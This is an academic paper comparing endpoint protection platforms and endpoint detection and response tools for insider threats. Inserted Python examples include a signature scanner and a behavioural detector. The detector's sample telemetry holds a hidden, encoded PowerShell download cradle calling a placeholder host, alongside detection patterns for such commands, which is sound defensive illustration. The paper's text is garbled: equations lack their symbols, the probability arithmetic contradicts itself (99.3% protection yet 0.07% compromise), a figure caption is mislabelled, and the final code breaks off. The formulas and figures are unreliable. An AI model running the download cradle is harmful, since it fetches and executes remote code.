Endpoint Protection: Measuring the Effectiveness of Remediation Technologies and Methodologies for Insider Threat
Sonali Chandel, Sun Yu, Tang Yitian, Zhou Zhili, Huang Yusheng
College of Engineering and Computing Sciences, New York Institute of Technology, Nanjing, China
{schandel, ysun33, ytang11, zzhou23, yhuang66}@nyit.edu
Abstract - With the increase in the incidence of data leakage, enterprises have started to realize that the endpoints (especially mobile devices) used by their employees are the primary cause of data breaches in most cases. Data shows that employee training, which aims to promote awareness of protecting the organization's sensitive data, is not very effective. Besides, popular third-party cloud services make it even more difficult for employees to keep their workplace's secrets safe. This pressing issue has given rise to a significant market for software products that provide endpoint data protection for these organizations. Our study discusses the methods and technologies behind the traditional, passive form of endpoint protection, the endpoint protection platform (EPP), and a newer, active form, endpoint detection and response (EDR). We compare and evaluate EPP and EDR in mechanism and effectiveness, and analyze the merits, faults, and key features that a good protection product should have. The objective of this paper is to help small and large companies improve their understanding of insider threats in a rapidly developing cyberspace full of potential risks and attacks, and to gain better control over their employees' endpoints so that future data leaks can be avoided. It should also help negligent users understand how serious the problem they face is and how careful they should be with their privacy when surfing the Internet while connected to the company's network. Finally, the paper aims to contribute to further research on endpoint detection and protection by trying to predict the future of protection products.
Keywords—Endpoint protection, Endpoint detection and
response, Endpoint protection platform, Data leakage, Privacy,
Insider threat, Data Breach
I. INTRODUCTION
Endpoint security, or endpoint protection, is an approach to protecting computer networks that are remotely bridged to client devices [1]. Many of the electronic devices we use, such as mobile phones, laptops, and tablets, are endpoints. Connecting laptops, tablets, mobile phones, and other wireless devices to corporate networks creates attack paths for security threats [2]. No one wants to be disturbed or eavesdropped on when sending or receiving messages over the network. As a result, endpoint security has become a hot topic for researchers in the cybersecurity area.
Laptops and mobile phones have become an essential part of modern life. The owner of an enterprise must work out which features and standard methods protect the most vulnerable endpoints. A phishing link in an e-mail can give a hacker access to company secrets, and a third-party cloud service can quickly become the hacker's target as well.
While many large organizations take a more sophisticated approach to endpoint security by using different, specialized products for the tasks of prevention, detection, and response, a growing trend is to implement a single "all-in-one" solution that enables centralized management of multiple security functions instead [3]. Companies look for software that covers all of these tasks so that it can help them defend against threats.
For IT decision-makers, the present time is crucial for increased investment in stronger endpoint protection. Of the 113 respondents to the 2018 Endpoint Security Spending Priorities Survey conducted by Barkly, advanced malware protection and prevention was by far the highest priority for most companies in 2018 [4]. According to the 2018 Insider Threat Report, at least 27% of the surveyed companies agreed that insider threats are causing much more damage than before, and at a higher frequency. In the same report, 53% of companies reported that they had experienced an insider attack more than once in the last year or so [5].
Insider threat is a generic term for a threat to an organization's security or data that comes from within the organization [6]. For many companies, the security of their information is of the greatest importance, and insiders are at the same time a prime target for attackers: they are hard to detect and can be manipulated into bypassing the firewalls in use. Many attackers target insiders, mostly through social engineering, to steal data or infiltrate the system. In the recent past many companies, Facebook, Sony, and LinkedIn among them, have been targeted this way.
There are several ways and tools to defend an endpoint. In this paper, we focus on two of them, namely the endpoint protection platform (EPP) and endpoint detection and response (EDR). EPP is a platform that consists of different security tools such as antivirus, anti-malware, data encryption, personal firewalls, and intrusion prevention. EDR, with its specific functions such as continuous monitoring, remediation, and no interference with the endpoint, has become a popular way of detecting and responding to insider threats.
Section I briefly introduces the content of the article. Section II covers related work on insider threats. Section III introduces the essential features of the endpoint protection platform, and Section IV discusses its drawbacks. Section V presents endpoint detection and response, including its disadvantages. Section VI compares the effectiveness of the endpoint protection platform and endpoint detection and response: we propose a model built from information obtained from test corporations and derive a formula for the effectiveness of the different products. Section VII draws the conclusion and discusses future work.

2019 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)
978-1-7281-2542-8/19/$31.00 ©2019 IEEE
DOI 10.1109/CyberC.2019.00023
II. RELATED WORK
The insider threat has become one of the biggest problems in the field of cybersecurity. Much work related to the insider threat has been done, and many papers have presented ways to detect it by proposing different models and architectures. Many experts have also tried to identify the risks by introducing new algorithms.
In [7], the author introduces a framework that uses different modules to detect insider threats based on algorithms and functional methods. An algorithm in [8] called GP also achieves this. Another mathematical method, discussed in [9], claims to help manage authorized admins to detect the insider threat. Some even propose that a system-based architecture called directory virtualization [10] could be used to detect the insider threat. Machine learning is another essential aspect of the modern internet, and in [11] a detection method based on machine learning is discussed.
In [12], the author presents a tool called user behavior analytics and gives a clear architecture and design idea for this software. Some white-hat hackers even propose using "decoy files" [13] to attract the insider's attention and then trap them. Different insider threat situations are discussed in [14], and [15] discusses different categories of detection tools. In [16], the author discusses in detail the situation in which an insider threat infiltrates a database system and briefly discusses how to handle the insider threat at an early stage.
Most of the papers mentioned above focus on new methods of detecting the insider threat, and they genuinely contribute to the development of detection methods. However, articles [7], [8], [9], [11], and [12] do not mention a mature product that could help ordinary consumers and clients defend against the insider threat. [10] and [13] propose practical methods for handling insider threats but do not discuss mature products. Another flaw is that they are all a little outdated: insider threats mutate so quickly that the methods they present may no longer be useful.
The survey papers [14], [15], and [16] are related to the topic of our article. [14] mainly discusses different scenarios of insider threat attacks but does not provide any solution for them. [15] and [16] describe some tools for defending against the insider threat in detail, but they do not cover their features and effectiveness or compare the tools. Our goal is to address all of these gaps.
We present distinct and detailed information about different types of threat detection and response technologies so that the reader can quickly and clearly understand the functions, features, merits, and flaws of each of them. We also present a comparison between EPP and EDR, gathering information and establishing a model of our own. We analyze them under different situations and factors and calculate their overall effectiveness and efficiency. Using the proposed model, we obtain a formula for the efficiency ratio of the two products and can predict which of them is more efficient under different circumstances. Using Matlab, we draw graphs and curves to visualize how the efficiency trend changes as the different factors evolve, which helps readers understand our research more easily.
III. A PASSIVE WAY TO DEFEND AGAINST THREATS: FEATURES OF THE ENDPOINT PROTECTION PLATFORM
The endpoint protection platform (EPP) is traditional, signature-based, passive endpoint protection software. Its primary mechanism for protecting the endpoint is to match objects against the signatures of known threats stored in its database to determine whether they are harmful. EPP is a set of software tools and technologies that secures endpoint devices [17]. The main procedure by which EPP treats a threat is shown in Figure 1: when a threat penetrates the firewall, the host intrusion detection system (HIDS) detects it and determines whether it is malicious, and the malicious ones are mitigated by the host intrusion prevention system (HIPS). The following sub-sections list the main features of EPP.
Figure 1. Process of how EPP addresses threats
A. Detection
The most significant part of endpoint protection is detection. EPP, like traditional antivirus software, has a complete signature-identification function backed by a large database of virus signatures, which can be used to identify every kind of already-known virus. The matching procedure is based on different algorithms; each security company has its own algorithms for detecting threats.
EPP is a union of different software components, and the mechanism most of them use is intrusion detection. Intrusion detection is a significant method of EPP: it is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of intrusions [4]. An IDS helps users defend against attackers and completes the intrusion detection procedure. Signature-based detection is just one of the detection methods used, but it is the most widely used. A HIDS monitors and collects the characteristics of hosts containing sensitive information and servers running public services, along with suspicious activities [18]. It is the most common system for defending against intrusion.
B. Protecting the infected system
Detection is certainly an essential part of endpoint protection. However, no matter how prudent users are, they sometimes still face a situation where viruses infect the system or the network through an endpoint. Organizations must eliminate any possibility of an external invasion through the endpoint to keep their systems secure. The protection function aims to eliminate a virus that is already inside the system, since it is the source of potentially significant devastation. It is crucial because if the EPP system takes no action, the virus will infect the whole system; protection supplies a remedy for such mistakes. EPP uses another algorithm for the HIPS. The HIPS must work together with the HIDS, but the significant difference between them is that the HIPS blocks the threats that the HIDS has identified as malicious: a HIPS has a mechanism for automatically mitigating the detected risk [19].
C. Whitelist and blacklist
The whitelist/blacklist function is another vital function that EPP provides, and "blacklist and whitelist" is treated as one of the significant solutions for endpoint security. EPP has its own database of viruses and will automatically blacklist or block software or files that are considered malicious. With the help of the whitelist, users can still access software or data, as a whitelisted application is marked safe for the system or network.
IV. WHY IS THE ENDPOINT PROTECTION PLATFORM NOT FOOLPROOF?
With its many merits, EPP is treated as a perfect guardian of the endpoint. However, EPP quickly shows its flaws when confronted with advanced hacking methods. EPP uses a massive database of virus signatures, and as a result the matching process wastes many resources. Sometimes the virus signatures cannot be matched in time because viruses mutate very fast. The most significant flaw of EPP, however, is that it cannot defend against insider threats, which have become one of the most popular methods of hacking these days. Some weaknesses of EPP are listed in the following sub-sections:
A. Signature matching needs too many resources
A considerable number of viruses are developed every day. An antivirus must record all of their signatures to guarantee the security of the endpoint. This also means that the signature database is so extensive that users must spend a lot of money on storage for it, and must also commit a significant share of their devices' resources whenever they scan their devices with the antivirus. It is an advantage that such a large number of threats can be detected and dealt with, but it also means that it can take a considerable amount of resources to run through each of these signatures and match them against a scannable resource (files, network traffic, etc.) [19]. "Cloud scan" is one method of solving the resource problem: the organization invokes a database of signatures in the cloud to match the signatures of files on the local computer. Many third-party companies provide this service, yet users still notice that the performance of their devices drops very sharply when a device is under attack.
B. The proportion of fileless attacks is on the rise
Viruses are mutable. Hackers develop a new virus by transforming existing features and changing the known signature to avoid detection by EPP. Creating a virus with a unique signature is child's play now, thanks to the nearly automated virus construction kits that have filled the internet over the past several years [20]. The Ponemon Institute's State of Endpoint Security Risk Report for 2018 revealed that 54% of organizations admitted having been the victim of a successful fileless or file-based attack; of all the organizations compromised, 77% were attacked by fileless techniques. The report also indicated that fileless attacks are ten times more likely to succeed than traditional, file-based methods [1].
Fileless attack techniques that exploit a fundamental gap in traditional endpoint security are on the rise, and current solutions are not able to stop them [21]. If the HIDS cannot match a signature, the HIPS will not act, so the protection chain fails completely. The HIDS typically runs on the operating system, which means it can be compromised by malicious insiders or malware [25]. Figure 2 shows that the frequency of fileless attacks is growing more rapidly than ever [21].
Figure 2. The growth of fileless and file-based attacks from 2016-2018
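The following is an added example, not code from the paper or from any EPP vendor, that makes the point of sections III.A, III.B, III.C and IV.B concrete: a minimal signature-based scanner with a hash allowlist/blocklist, a byte-pattern signature database, and a HIPS step that only acts on what the HIDS flagged. The sample "files", hashes, signature and the mutate() step are all constructed for the example. It shows that appending a byte still gets caught by the pattern, while a one-word change to the payload defeats both the hash and the pattern, and the scanner's default-allow behaviour lets the unknown sample through.

```python
"""Added example (not from the paper): a minimal signature-based scanner of
the kind an EPP engine runs, applied to constructed sample "files". It shows
the two lookups the text describes, a hash blocklist/allowlist and a byte
pattern signature database, and why a small change to a known sample is
enough to slip past both. Names, samples and signatures are all invented."""
import hashlib
import re

# Constructed byte strings standing in for a known malicious binary and a
# vendor tool the administrator has explicitly allowlisted.
KNOWN_MALWARE = (b"MZ\x90\x00"
                 b"persist=run-key;fetch=http://example.invalid/p.bin")
TRUSTED_TOOL = b"MZ\x90\x00vendor-signed-updater v2.1"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Section III.C: hash-based allowlist and blocklist (SHA-256 of the file).
ALLOWLIST = {sha256_hex(TRUSTED_TOOL)}
BLOCKLIST = {sha256_hex(KNOWN_MALWARE)}

# Section III.A: byte-pattern signatures. A real engine stores millions of
# these and scans every file against all of them, which is where the
# resource cost discussed in section IV.A comes from.
SIGNATURES = {
    "Trojan.Generic.Fetch": re.compile(
        rb"persist=run-key;fetch=http://[a-z.]+/p\.bin"),
}


def scan_file(data: bytes) -> dict:
    """HIDS-style verdict for one file: 'allow', 'block' or 'unknown'.

    Lookup order: allowlisted hash, blocklisted hash, then pattern match.
    Anything unmatched is 'unknown' and is let through, which is the
    default-allow gap that mutated and fileless attacks exploit."""
    digest = sha256_hex(data)
    if digest in ALLOWLIST:
        return {"verdict": "allow", "reason": "allowlisted hash", "sha256": digest}
    if digest in BLOCKLIST:
        return {"verdict": "block", "reason": "blocklisted hash", "sha256": digest}
    for name, pattern in SIGNATURES.items():
        if pattern.search(data):
            return {"verdict": "block", "reason": f"signature {name}", "sha256": digest}
    return {"verdict": "unknown", "reason": "no signature matched", "sha256": digest}


def hips_action(verdict: dict) -> str:
    """Section III.B: the HIPS only mitigates what the HIDS flagged as malicious."""
    return "quarantine" if verdict["verdict"] == "block" else "none"


def mutate(data: bytes) -> bytes:
    """Attacker-side change in its simplest form: alter the download path so
    neither the file hash nor the byte pattern matches any more."""
    return data.replace(b"/p.bin", b"/q.bin")


def demo() -> dict:
    """Run the scanner over the four cases a practitioner would compare."""
    cases = {
        "known_malware": KNOWN_MALWARE,
        "trusted_tool": TRUSTED_TOOL,
        # same payload with one trailing byte: hash changes, pattern still hits
        "appended_byte": KNOWN_MALWARE + b"\x00",
        # path changed: hash changes and the pattern no longer hits
        "mutated": mutate(KNOWN_MALWARE),
    }
    return {name: (scan_file(d)["verdict"], hips_action(scan_file(d)))
            for name, d in cases.items()}
```

Running demo() gives "block"/"quarantine" for the known sample and its byte-appended copy, "allow" for the allowlisted tool, and "unknown"/"none" for the mutated sample: the scanner has no signal for it, so nothing downstream acts, which is exactly the gap the behavioural monitoring of section V is meant to close.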
C. Many functions require the internet
"Cloud scan" can be a solution that avoids occupying too many resources while scanning for the signatures of known threats. However, using a cloud scan requires a connection to the cloud server, so the device or system must be connected to the network all the time. For example, data loss prevention (DLP) is an essential component of EPP. DLP is a strategy for making sure that end users do not send sensitive or critical information outside the corporate network [22]. However, for DLP to work the EPP typically must be connected to the internet. Beyond the cloud scan, users must also connect to the security company's server, as this is the only way they can get the latest updated data, security patches, and information about recent threats.
In some cases, if one endpoint has already been infected, the virus spreads into the system and the network very fast. This can happen even when an employee unintentionally connects an infected device to the corporate network, so employees need to be very careful when connecting to it. Sometimes EPP cannot detect this kind of threat and, as a result, cannot eliminate it either. Such situations can lead to a massive loss for the company.
D. Insider threats can cause more damage than external threats
Many different reasons can lead to data leakage. However, the main causes of information leakage can be divided into two categories: accidental exposure and malicious exposure [23].
• Accidental exposure: Accidental exposure stems from negligent actions taken by employees, such as poor password security or the unauthorized download of infected software and applications without the IT department's knowledge or permission [23]. A phishing e-mail is another widespread factor that leads to the insider threat. Most insider threats are employees of a company who are manipulated by hackers into handing over the data they want. The insider threat is more powerful than any external attack because an employee can provide easy access to the company's system. The only solution is to educate and train employees and improve their awareness of data privacy and security [6].
• Malicious exposure: Malicious exposure is another very common situation when it comes to data theft. It stems from a criminal motive, such as a competing company or revenge from a former employee who intends to destroy the whole system of a company, or at least the part they have access to. They can achieve this by releasing malicious software into the company's network or system. This behavior, however, can be eliminated relatively easily with the help of defensive tools like EPP.
Figure 3 [5] shows that there has been a considerable increase in hacking through endpoints to gain access to a corporation's confidential and commercial secrets. Hackers' attacks have made the state of endpoint security more severe than ever before. Besides stealing sensitive data, the target of these attacks varies from financial information to operational data, as these data are top secret. Their leakage causes severe loss to a company, as it loses its clients' or employees' data. Therefore, enterprises need to be vigilant about insider threats [2]. The complete procedure by which an insider threat spreads and infects the entire system is shown in Figures 4, 5, 6, and 7. Many attackers have begun to use new kinds of threats with no known signature to avoid detection by antivirus and EPP. In such cases, EDR becomes another solution for protecting the endpoint.
V. SOLVING MOST DRAWBACKS OF EPP: FEATURES OF ENDPOINT DETECTION AND RESPONSE
Passively waiting for traditional security countermeasures to detect attacks is not enough. Proactive threat hunting, led by human security experts, is a requirement for any organization looking to achieve or improve real-time threat detection and incident response [24]. An endpoint detection and response (EDR) system is advanced, active endpoint protection software. Threat intelligence is an essential feature of EDR; it also supplies anomaly detection and alerting, and remediation of an internal network that has been infected. EDR products can also use machine learning to predict and avoid threats. The main features of EDR are listed in the following sub-sections:
Figure 3. Different data sources under the hacker's radar
Figure 4. One trusted endpoint is infected
Figure 5. The virus infects the server through the internal network
Figure 6. The whole internal network and all endpoints are infected
Figure 7. The process of an insider threat infecting the entire internal network
A. Threat intelligence
Threat intelligence, also known as cyber threat intelligence (CTI), is organized, analyzed, and refined information about potential or current attacks that threaten an organization [25]. Avoiding risk is much safer and more reliable than putting the available data and network at risk and then trying to fix the damage. EDR is not only protection software: its threat intelligence function allows it to warn corporations about potential risks and threats, providing information about the threat collected by the EDR server. This kind of intelligence facilitates the elimination of the insider threat by analyzing information about insider threats that have happened in the past rather than predicting a latent risk.
B. Continuous monitoring
The only way to detect abnormal endpoint behavior is to enhance control over the endpoint. If one endpoint is infected, EDR detects the unusual activity of that particular endpoint immediately and isolates it instantaneously. EDR supervises endpoints dynamically, which means it tests endpoints incessantly and automatically. Furthermore, it can supply CPU-level protection that defends the kernel of the server. More sophisticated behavior-based protection includes visibility into activities at lower levels of the system, including the CPU. CPU-level visibility is effective for blocking malware that attempts to manipulate and change memory, including many exploits [26]. Powerful EDR tools make this data easy to access, providing immediate visibility into any area of the organization. Consistent monitoring is meant to stop a threat from spreading through the endpoint [27].
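The following is an added example, not code from the paper or from any EDR product, of the behaviour-based detection that continuous monitoring makes possible and that the signature matching of section IV.B cannot do. It scores a stream of process-creation events against a few rules typical of a fileless attack (an Office application spawning a script host, an encoded and hidden PowerShell command, a download cradle in the decoded script) and isolates a host once the accumulated severity crosses a threshold. The event layout, the rule names, the severities, the threshold and the three sample events are assumptions constructed for the example.

```python
"""Added example (not from the paper): a behaviour-based detector of the kind
an EDR sensor applies to a stream of process-creation events. It needs no
file signature: it flags the parent/child relationship and command-line
traits typical of fileless attacks (an Office document spawning PowerShell
with a hidden, encoded download cradle) and isolates the host once the
accumulated severity crosses a threshold. The event layout, rule names and
thresholds are assumptions made for this example."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    ts: str
    host: str
    user: str
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str


@dataclass
class Alert:
    host: str
    rule: str
    severity: int
    ts: str
    detail: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_FLAG = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression|Invoke-WebRequest|DownloadString|"
    r"Net\.WebClient)\b")


def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(ev: ProcessEvent) -> list:
    """Apply the behavioural rules to one event; several may fire at once."""
    alerts = []
    if ev.parent.lower() in OFFICE_APPS and ev.image.lower() in SCRIPT_HOSTS:
        alerts.append(Alert(ev.host, "office_spawns_script_host", 8, ev.ts,
                            f"{ev.parent} -> {ev.image}"))
    decoded = decode_encoded_command(ev.cmdline)
    if decoded is not None:
        alerts.append(Alert(ev.host, "encoded_powershell", 5, ev.ts, decoded))
    if HIDDEN_FLAG.search(ev.cmdline):
        alerts.append(Alert(ev.host, "hidden_window", 3, ev.ts, ev.cmdline))
    # Inspect the decoded script if there is one, otherwise the raw command line.
    script = decoded if decoded is not None else ev.cmdline
    if DOWNLOAD_CRADLE.search(script):
        alerts.append(Alert(ev.host, "download_cradle", 6, ev.ts, script))
    return alerts


def run_sensor(events, isolate_threshold: int = 10):
    """Score each host over the event stream; isolate it when the score
    reaches the threshold (the 'detect and isolate' step of section V.B)."""
    alerts, score, isolated = [], {}, set()
    for ev in events:
        for a in evaluate(ev):
            alerts.append(a)
            score[a.host] = score.get(a.host, 0) + a.severity
            if score[a.host] >= isolate_threshold:
                isolated.add(a.host)
    return alerts, isolated


# Constructed telemetry: a benign admin session, a benign but encoded
# command, and a macro-launched fileless download cradle.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    ProcessEvent("2019-03-04T09:01:12Z", "WS-007", "alice", "explorer.exe",
                 "powershell.exe", "powershell.exe Get-ChildItem C:\\Users"),
    ProcessEvent("2019-03-04T09:02:40Z", "WS-013", "bob", "explorer.exe",
                 "powershell.exe", "powershell.exe -enc " + encode_ps("Get-Date")),
    ProcessEvent("2019-03-04T09:05:03Z", "WS-042", "carol", "WINWORD.EXE",
                 "powershell.exe",
                 "powershell.exe -NoP -w hidden -enc " + encode_ps(CRADLE)),
]
```

run_sensor(SAMPLE_EVENTS) raises four alerts for WS-042 and isolates it, raises a single low-severity alert for WS-013 (an encoded command on its own is suspicious but common in administration, so it stays below the threshold), and nothing for WS-007. The threshold is what keeps the false-positive rate discussed at the end of this section in check: each rule alone is weak evidence, and only their combination on one host triggers a response.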
C. Remediation and cleanup
Once abnormal endpoints are cleaned up, the escalation of the virus stops, and one may think the whole system is clean and safe. However, an advanced virus acts like a drop of ink in pure water: it diffuses to other parts and infects the internal network very fast, and every residue of it can regenerate the virus. This is one of the biggest drawbacks of EPP, as it cannot deal with the complete internal network but only with part of the endpoint. EDR can scan the whole internal network to guarantee that there are no residues of the virus, and it can also repair the damage caused by the virus to maintain the security of the internal system.
D. Observe without interference
"No one wants to burden the endpoint with heavy client software anymore: that was one of the antiviruses' biggest drawbacks" [27]. As a security researcher from the Office of Information Technology said, antivirus needs to be installed on the user's device, which wastes many of the endpoint's resources. EDR, by contrast, does most of its work in a central component on the network, with only a lightweight endpoint detection component on each device. For example, a network manager can install the EDR server centrally rather than a heavy client on every employee's device, and still protect the entire internal network of the organization. Note that the telemetry still has to be collected from each endpoint, so the sensor cannot be dispensed with entirely.
E. Using machine learning to detect unknown threats
Machine learning is a subset of artificial intelligence in the field of computer science that often uses statistical techniques to give computers the ability to "learn" from data without being explicitly programmed [28]. By using machine learning, EDR also becomes a "clever" platform, which is another of its advantages over EPP. Predictive models use sophisticated analytical techniques, such as deep learning, to understand the characteristics of malware and "predict" the likelihood that an unknown application is malware. This enables them to block never-before-seen attacks with a high degree of certainty [26]. Machine learning improves the ability to identify threats that have never been encountered before. In conditions where threats are mutable, this ability may become the most significant merit of EDR and the reason why most companies prefer to use it now.
F. Highly customizable
Another feature of EDR products is that they can adjust themselves to suit a company's environment. Every company has its own distinguishing environment. Scan from the root or from a folder? Are the essential files stored on disk C or D? How to mitigate false positives? These functions require machine learning and AI capability, which are exactly the most significant advantages of EDR. "Sophisticated endpoint protection providers can take the burden off of the admin by developing protection models that are automatically tailored for each organization by using machine learning to analyze the organization's unique software profile" [34].
Through machine learning, EDR can distinguish standard software from malware, know which parts to focus on when scanning, refine its effectiveness as time goes by, and save more resources than an unfit, unintelligent EDR product.
Because of these advantages, EDR has become very popular in many organizations, and many are replacing EPP with EDR to protect their network systems. However, EDR is not a panacea. Some of EDR's drawbacks still trouble companies: very high false-positive rates and the requirement for highly trained operators are two of its most significant flaws.
How well the high false-positive rate is mitigated is a crucial criterion for estimating the effectiveness of an EDR product. A high frequency of false positives lowers the productivity of an organization. "Some endpoint protection models force a trade-off between the strength of protection and false positives - they take a heavy-handed approach that blocks malware but also flags much legitimate software in the process" [30]. An EDR product with a strict protection mechanism can certainly block most threats, but sometimes it treats normal software as malware as well. In such situations it causes a lot of trouble, such as denying access to a normal file in the way it is usually used.
EDR is an advanced technology for dealing with cyber and network threats. The more advanced it is, the greater the demands on the operators who run it. A company needs to hire highly trained operators to control the entire EDR system, which ultimately increases its costs. This is not a very big problem for a large company, but for some medium- or small-sized companies it becomes a significant concern, as they must weigh the increasing cost against their information security [31].
Table 1 summarizes the main features of EPP and EDR mentioned above.
Table 1. Comparison between EPP and EDR

              EPP                                  EDR
Rationale     Unification of different passive     Active detection, threat intelligence,
              functions                            and response
Functions     Database of virus signatures         Threat intelligence
              HIDS and HIPS                        Continuous monitoring
              Blacklist and whitelist              Remediation and cleanup
                                                   Observe without interference
                                                   Machine learning for unknown threats
                                                   Highly customizable
Drawbacks     Signature matching needs too many    High false-positive rates
              resources                            Requires highly trained operators
              Signature-based detection is
              outdated
              Cannot defend against insider
              threats
              Many functions require the internet
VI. WHICH IS BETTER: EPP OR EDR?
Having covered the fundamental concepts of the two products, we now propose a model to compare the effectiveness of both.
A. The EPP model
First, we built a model for EPP. We know that EPP is a passive defender and uses virus signature matching to detect threats. Moreover, as we mentioned in Section IV, two disadvantages stand out:
• It reduces the efficiency of the system because it takes too many resources, which lowers the productivity of a company.
• Signature-based detection leads to false positives.
According to the statistical data from AV-TEST company
[32], we found that the average efficiency reduced by running
EPP is 12.5%. In addition, according to statistical data from
AV-C company [33], we found that the average protection rate
is 99.3%, and the average false-positive rate is 
. With the help of these data, we can divide EPP into two states:
• Protection: EPP detects the threat and reports it successfully.
• Compromise: EPP does not detect the threat and allows it to invade the system successfully.
The protection state can be further divided into two situations:
• True report: a threat truly invades, and EPP detects and reports it.
• False positive: there is no actual threat invasion, but EPP mistakes something for an invasion and reports it.
We take R as the rate at which EPP enters the protection state. From the statistical data collected by AV-C [33] we know that R is 99.3%, so the formula can be represented as follows:

$$R = 99.3\% \approx \frac{2983}{3000}, \qquad 1 - R \approx \frac{17}{3000}\ (0.07\%) \qquad (1)$$
Because we have to take the performance of the computer into account, we assume that
• y is the lost productivity of one company,
• is the work efficiency of one company,
• is the time needed to eliminate the threat,
• is the working hours.
Following the eight-hour workday implemented by many companies, we assume is equal to eight hours.
Therefore, the formula of the true report is:
y =12.5% (2)
Considering the states of EPP and according to equation (1),
multiplying the probability of protection by the probability of
true report, we can obtain the probability of true report as
99.3%×

Now consider the false-positive state. The formula for a false positive is: y=12.5%(−)(3)
where is the time that cannot be put to work because of false positives. According to the services of some EPP companies, they need 1-2 working days to resolve a false positive, so it can be treated as 8-16 hours.
Considering the state of EPP and according to equation (1),
multiplying the probability of protection by the probability of
false positive. We can obtain the probability of false-positive
as 99.3%× 
.
In the worst situation, a compromise: y=(4)
Since the probability of protection is R and EPP has only two states, protection and compromise, the probability of compromise is 1-R, where R is 99.3%. Therefore, the compromise state occurs at a rate of 0.07%.
Then we calculate the weighted average of all the three cases,
and finally get the average productivity loss, which is as
follows: y=0.1240.007
+0.0007(5)
Using equation (5), we used Matlab to draw the trend map. In Figure 8, we find that the intercept on the Y axis (loss) is 2, and the value of Y increases slightly with X. The reason for this trend is that the probability of compromise is very low, so even if (the time needed to eliminate the threat) changes a lot, it does not have a big impact on the company's economic losses. The Y intercept starts from 2 because running EPP causes the system to run slowly, which leads to a decrease in productivity.
Figure 8. The trend of EPP loss (is 8h, is 24h, is 1)
B. The EDR model
We know that the EDR system defends against a threat very actively. The basic concept of EDR is that it gains threat intelligence to help users predict a potential threat and then protects against it in advance. We assume R is the probability that EDR enters the protection state. The value domain of R is [0, 1], as it is a probability. We design a specific parameter () for EDR. () is a function of R that represents the reduction, as a proportion, of the invasive time of the threat. For example, when a virus invades and causes system paralysis (a state in which the machines cannot work) for 1 hour, EDR can reduce the severity of the invasion by collecting intelligence, thus reducing the severity of the paralysis event. When () = , the virus can only paralyze the system for half an hour. R is inversely proportional to (), but both of them are smaller than 1. The higher the probability R, the more information EDR has, which means the shorter the time of system paralysis. Therefore, the formula for EDR is:
y = () (6)
Then we calculate the weighted average of the two cases and finally get the average productivity loss as:
y = R ∙ () (7)
Taking the actual state of most EDR products into account, we restrict the domain of R to [0.5, 1]: since the defense rate of most EDR products is higher than 95%, R should not lie between 0 and 0.5. In our model, we assume () = 1 − . Based on the above assumptions, we get figure 9.
Figure 9. The trend of EPP loss (is 8h, and is 1)
As shown in Figure 9, as R increases, the loss of the company decreases dramatically. When R reaches 1, the loss reaches 0: all viruses are defended against.
After trying multiple values in MATLAB, we found that if the parameters are too large or too small, the trend fluctuates over either a very large or a very small range, and = 10 is the most reasonable value, which lets the plot show its trend over a reasonable range. So, in this graph, we assume = 10h as the average time for most EDR products to clean up an invasive virus. However, we know that varies from one virus to another, so we decided to take this unknown value into account and draw a 3D figure. In figure 10, we can see that as R and increase, the loss of the company increases, which fits the real situation and verifies the effectiveness of our model.
Figure 10. The trend of EDR loss (is 8h, and is 1)
C. Comparison of EPP and EDR
After obtaining the data and figures for EDR and EPP, we combined them into one figure and compared their efficiency. In figure 11, we can see that there is an intersecting boundary between EPP and EDR. By solving the simultaneous equations of function (5) and function (7), we obtained the boundary equation as follows:
=0.8240
()0.0007 (8)
Figure 11. The combined trend of EPP and EDR loss (is 8h, is 24h and is 1; the red plane is EDR, and the blue plane is EPP)
Therefore, to the left of this boundary the blue plane is above the red plane, which means that the loss with EPP is higher than with EDR. This is the exceptional situation in which the success rate R of EDR is high and the paralysis time caused by the threat is short. So, the best choice under such circumstances is EDR, and the prerequisite is:
<0.8240
()0.0007 (9)
To the right of the boundary, the red plane is higher, and the best choice in that case is EPP. The prerequisite is:
>0.8240
()0.0007 (10)
EDR, once compromised, will be paralyzed for a long time; therefore the slope of this plane is significant. Once its defense succeeds, it does not have to bear the cost of slowing down the system, so the loss of productivity can be as low as zero. EPP is the opposite: it pays a constant price but runs stably, and it is not influenced dramatically by the threat.
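As an added worked example (not code from the paper), the following Python implements the weighted-average reasoning behind the EPP model, the EDR model and the EPP/EDR boundary above. Because the extracted page has lost the symbols of equations (5), (7) and (8), the per-state loss forms are assumptions chosen to follow the prose: a true report costs a short handling time, a false positive costs the 24 hours of unavailability, a compromise costs the full elimination time t, and EDR scales its protected-state loss by φ(R) = 1 − R and carries no slowdown overhead. The page's constants are W = 8h, efficiency 1, R = 99.3% for EPP and t = 10h; the false-positive share P_FALSE_POSITIVE, the handling time TRUE_REPORT_HOURS and the overhead EPP_OVERHEAD are constructed values. Losses are expressed as a fraction of one working day, so 0.125 equals one lost hour.

```python
"""Expected productivity-loss model for an EPP agent versus an EDR agent.

Added worked example. It implements the weighted-average reasoning the paper
describes (three EPP states, two EDR states, crossover boundary) with
functional forms that are assumptions chosen to match the prose, not the
paper's own equations (5), (7) and (8). Loss y is a fraction of one working day.
"""
from dataclasses import dataclass
from typing import List, Optional

# Values taken from the page
WORK_HOURS = 8.0            # eight-hour workday
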